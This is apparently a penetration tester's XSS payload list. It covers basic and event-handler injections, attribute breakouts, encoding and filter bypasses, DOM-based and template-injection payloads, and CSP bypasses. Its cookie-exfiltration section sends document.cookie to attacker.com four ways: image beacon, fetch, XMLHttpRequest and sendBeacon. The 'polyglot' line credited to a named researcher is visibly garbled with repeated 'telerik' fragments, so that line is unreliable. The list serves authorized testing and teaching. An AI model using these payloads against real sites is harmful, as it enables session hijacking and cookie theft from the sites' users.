# XSS Test Payloads
# For educational and authorized testing purposes only.
# Use these on systems you own or have explicit permission to test.

# ============================================================
# Basic Payloads — Detection
# ============================================================

# Script tag (simplest test)
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert(document.domain)</script>

# Confirm/prompt variants (bypass alert-specific filters)
<script>confirm(1)</script>
<script>prompt(1)</script>

# ============================================================
# Event Handler Payloads — Bypass Script Tag Filters
# ============================================================

# Image with error handler
<img src=x onerror=alert(1)>
<img src=x onerror="alert(document.cookie)">

# SVG
<svg onload=alert(1)>
<svg/onload=alert(1)>

# Body/iframe
<body onload=alert(1)>
<iframe onload=alert(1)>

# Input with focus
<input autofocus onfocus=alert(1)>
<input onmouseover=alert(1) value="hover me">

# Details/summary
<details open ontoggle=alert(1)>

# Marquee (older browsers)
<marquee onstart=alert(1)>

# ============================================================
# Attribute Injection — When Inside an HTML Attribute
# ============================================================

# Break out of attribute
" onmouseover="alert(1)
' onfocus='alert(1)' autofocus='

# Break out of tag entirely
"><script>alert(1)</script>
'><script>alert(1)</script>

# JavaScript in href
<a href="javascript:alert(1)">click</a>
<a href="javascript:alert(document.cookie)">click</a>

# ============================================================
# Encoding and Filter Bypass
# ============================================================

# Case variation
<ScRiPt>alert(1)</ScRiPt>
<IMG SRC=x OnErRoR=alert(1)>

# Null byte injection
<scri%00pt>alert(1)</scri%00pt>

# HTML entity encoding
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>

# Unicode encoding
<script>\u0061lert(1)</script>

# Double encoding
%253Cscript%253Ealert(1)%253C%252Fscript%253E

# Without parentheses
<script>alert`1`</script>
<img src=x onerror=alert`1`>

# Without spaces
<svg/onload=alert(1)>
<img/src=x/onerror=alert(1)>

# ============================================================
# Cookie Exfiltration — Demonstrating Impact
# ============================================================

# Image beacon
<script>new Image().src="http://attacker.com/steal?c="+document.cookie</script>

# Fetch API
<script>fetch("http://attacker.com/steal?c="+document.cookie)</script>

# XMLHttpRequest
<script>var x=new XMLHttpRequest();x.open("GET","http://attacker.com/steal?c="+document.cookie);x.send()</script>

# Navigator.sendBeacon (less likely to be blocked)
<script>navigator.sendBeacon("http://attacker.com/steal",document.cookie)</script>

# ============================================================
# DOM-Based XSS
# ============================================================

# URL fragment injection
#<script>alert(1)</script>

# document.write sink
<script>document.write('<img src=x onerror=alert(1)>')</script>

# innerHTML sink
<img src=x onerror="this.parentElement.innerHTML='<img src=x onerror=alert(1)>'">

# ============================================================
# Polyglot Payloads — Work in Multiple Contexts
# ============================================================

# Jamieson O'Reilly's polyglot
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%%0telerik%%telerik11telerik/telerik/oNcliCk=alert()//

# Simple polyglot
'"><img src=x onerror=alert(1)>

# ============================================================
# Framework-Specific
# ============================================================

# Angular template injection
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}

# Vue.js template injection
{{_c.constructor('alert(1)')()}}

# ============================================================
# CSP Bypass Techniques
# ============================================================

# Using allowed CDN (if script-src includes a CDN)
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.0/angular.min.js"></script>
<div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>

# Base tag injection (redirect script loads)
<base href="http://attacker.com/">

# ============================================================
# Notes
# ============================================================

# Testing methodology:
# 1. Start with <b>test</b> to check if HTML renders
# 2. Try <script>alert(1)</script> for basic XSS
# 3. If script tags filtered, try event handlers
# 4. If event handlers filtered, try encoding bypasses
# 5. Check for DOM-based XSS in JavaScript sources
# 6. Test CSP headers with CSP Evaluator (https://csp-evaluator.withgoogle.com/)
